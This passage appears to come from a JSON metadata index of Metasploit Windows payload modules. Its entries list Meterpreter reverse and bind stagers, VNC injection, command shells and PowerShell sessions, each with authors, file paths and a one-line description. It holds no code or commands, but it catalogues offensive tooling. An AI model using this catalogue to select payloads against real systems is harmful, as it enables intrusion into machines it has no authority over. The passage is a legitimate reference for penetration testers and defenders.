"ref_name": "windows/vncinject/reverse_udp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/vncinject/reverse_winhttp": {
"name": "VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)",
"full_name": "payload/windows/vncinject/reverse_winhttp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP (Windows winhttp)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-11-21 13:53:33 +0000",
"path": "/modules/payloads/stagers/windows/reverse_winhttp.rb",
"is_install_path": true,
"ref_name": "windows/vncinject/reverse_winhttp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/exec": {
"name": "Windows x64 Execute Command",
"full_name": "payload/windows/x64/exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Execute an arbitrary command (Windows x64)",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/x64/exec.rb",
"is_install_path": true,
"ref_name": "windows/x64/exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/loadlibrary": {
"name": "Windows x64 LoadLibrary Path",
"full_name": "payload/windows/x64/loadlibrary",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"scriptjunkie",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Load an arbitrary x64 library path",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/windows/x64/loadlibrary.rb",
"is_install_path": true,
"ref_name": "windows/x64/loadlibrary",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/messagebox": {
"name": "Windows MessageBox x64",
"full_name": "payload/windows/x64/messagebox",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"pasta <jaguinaga@infobytesec.com>"
],
"description": "Spawn a dialog via MessageBox using a customizable title, text & icon",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-19 18:19:24 +0000",
"path": "/modules/payloads/singles/windows/x64/messagebox.rb",
"is_install_path": true,
"ref_name": "windows/x64/messagebox",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter/bind_ipv6_tcp": {
"name": "Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager",
"full_name": "payload/windows/x64/meterpreter/bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for an IPv6 connection (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter/bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter/bind_ipv6_tcp_uuid": {
"name": "Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support",
"full_name": "payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for an IPv6 connection with UUID Support (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter/bind_ipv6_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter/bind_named_pipe": {
"name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager",
"full_name": "payload/windows/x64/meterpreter/bind_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"UserExistsError"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for a pipe connection (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 17:37:33 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter/bind_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter/bind_tcp": {
"name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager",
"full_name": "payload/windows/x64/meterpreter/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for a connection (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter/bind_tcp_uuid": {
"name": "Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)",
"full_name": "payload/windows/x64/meterpreter/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for a connection with UUID Support (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter/reverse_http": {
"name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)",
"full_name": "payload/windows/x64/meterpreter/reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Tunnel communication over HTTP (Windows x64 wininet)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-03-20 11:27:43 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_http.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter/reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter/reverse_https": {
"name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (wininet)",
"full_name": "payload/windows/x64/meterpreter/reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>",
"agix",
"rwincey"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Tunnel communication over HTTPS (Windows x64 wininet)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-03-20 11:27:43 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_https.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter/reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter/reverse_named_pipe": {
"name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager",
"full_name": "payload/windows/x64/meterpreter/reverse_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker via a named pipe pivot",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-09-01 03:49:00 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter/reverse_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter/reverse_tcp": {
"name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager",
"full_name": "payload/windows/x64/meterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter/reverse_tcp_rc4": {
"name": "Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/x64/meterpreter/reverse_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves",
"hdm <x@hdm.io>",
"mihi",
"max3raza",
"RageLtMan"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-03-04 17:43:15 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter/reverse_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/x64/meterpreter/reverse_tcp_uuid": {
"name": "Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)",
"full_name": "payload/windows/x64/meterpreter/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker with UUID Support (Windows x64)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter/reverse_winhttp": {
"name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)",
"full_name": "payload/windows/x64/meterpreter/reverse_winhttp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Tunnel communication over HTTP (Windows x64 winhttp)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-03-20 11:27:43 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_winhttp.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter/reverse_winhttp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter/reverse_winhttps": {
"name": "Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)",
"full_name": "payload/windows/x64/meterpreter/reverse_winhttps",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Tunnel communication over HTTPS (Windows x64 winhttp)",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-03-20 11:27:43 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_winhttps.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter/reverse_winhttps",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter_bind_named_pipe": {
"name": "Windows Meterpreter Shell, Bind Named Pipe Inline (x64)",
"full_name": "payload/windows/x64/meterpreter_bind_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"UserExistsError",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Connect to victim and spawn a Meterpreter shell",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 17:37:33 +0000",
"path": "/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter_bind_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter_bind_tcp": {
"name": "Windows Meterpreter Shell, Bind TCP Inline (x64)",
"full_name": "payload/windows/x64/meterpreter_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"OJ Reeves",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Connect to victim and spawn a Meterpreter shell",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 17:37:33 +0000",
"path": "/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter_reverse_http": {
"name": "Windows Meterpreter Shell, Reverse HTTP Inline (x64)",
"full_name": "payload/windows/x64/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"OJ Reeves",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Connect back to attacker and spawn a Meterpreter shell",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 17:37:33 +0000",
"path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter_reverse_https": {
"name": "Windows Meterpreter Shell, Reverse HTTPS Inline (x64)",
"full_name": "payload/windows/x64/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"OJ Reeves",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Connect back to attacker and spawn a Meterpreter shell",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 17:37:33 +0000",
"path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter_reverse_ipv6_tcp": {
"name": "Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)",
"full_name": "payload/windows/x64/meterpreter_reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"OJ Reeves",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Connect back to attacker and spawn a Meterpreter shell",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 17:37:33 +0000",
"path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter_reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/meterpreter_reverse_tcp": {
"name": "Windows Meterpreter Shell, Reverse TCP Inline x64",
"full_name": "payload/windows/x64/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"OJ Reeves",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Connect back to attacker and spawn a Meterpreter shell",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 17:37:33 +0000",
"path": "/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/powershell_bind_tcp": {
"name": "Windows Interactive Powershell Session, Bind TCP",
"full_name": "payload/windows/x64/powershell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ben Turner",
"Dave Hardy",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Listen for a connection and spawn an interactive powershell session",
"references": [
"URL-https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-26 08:40:07 +0000",
"path": "/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/powershell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/powershell_reverse_tcp": {
"name": "Windows Interactive Powershell Session, Reverse TCP",
"full_name": "payload/windows/x64/powershell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ben Turner",
"Dave Hardy",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Connect back to attacker and spawn an interactive powershell session",
"references": [
"URL-https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-26 08:40:07 +0000",
"path": "/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/powershell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/shell/bind_ipv6_tcp": {
"name": "Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager",
"full_name": "payload/windows/x64/shell/bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection (Windows x64)",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/shell/bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/shell/bind_ipv6_tcp_uuid": {
"name": "Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support",
"full_name": "payload/windows/x64/shell/bind_ipv6_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection with UUID Support (Windows x64)",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/x64/shell/bind_ipv6_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/shell/bind_named_pipe": {
"name": "Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager",
"full_name": "payload/windows/x64/shell/bind_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"UserExistsError"
],
"description": "Spawn a piped command shell (Windows x64) (staged). Listen for a pipe connection (Windows x64)",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 17:37:33 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/x64/shell/bind_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/shell/bind_tcp": {
"name": "Windows x64 Command Shell, Windows x64 Bind TCP Stager",
"full_name": "payload/windows/x64/shell/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Spawn a piped command shell (Windows x64) (staged). Listen for a connection (Windows x64)",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/shell/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/shell/bind_tcp_uuid": {
"name": "Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)",
"full_name": "payload/windows/x64/shell/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Spawn a piped command shell (Windows x64) (staged). Listen for a connection with UUID Support (Windows x64)",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/x64/shell/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/shell/reverse_tcp": {
"name": "Windows x64 Command Shell, Windows x64 Reverse TCP Stager",
"full_name": "payload/windows/x64/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker (Windows x64)",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/x64/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/shell/reverse_tcp_rc4": {
"name": "Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/x64/shell/reverse_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>",
"mihi",
"max3raza",
"RageLtMan"
],
"description": "Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-03-04 17:43:15 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/x64/shell/reverse_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/x64/shell/reverse_tcp_uuid": {
"name": "Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)",
"full_name": "payload/windows/x64/shell/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker with UUID Support (Windows x64)",
"references": [
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/x64/shell/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/x64/shell_bind_tcp": {
"name": "Windows x64 Command Shell, Bind TCP Inline",
"full_name": "payload/windows/x64/shell_bind_tcp",
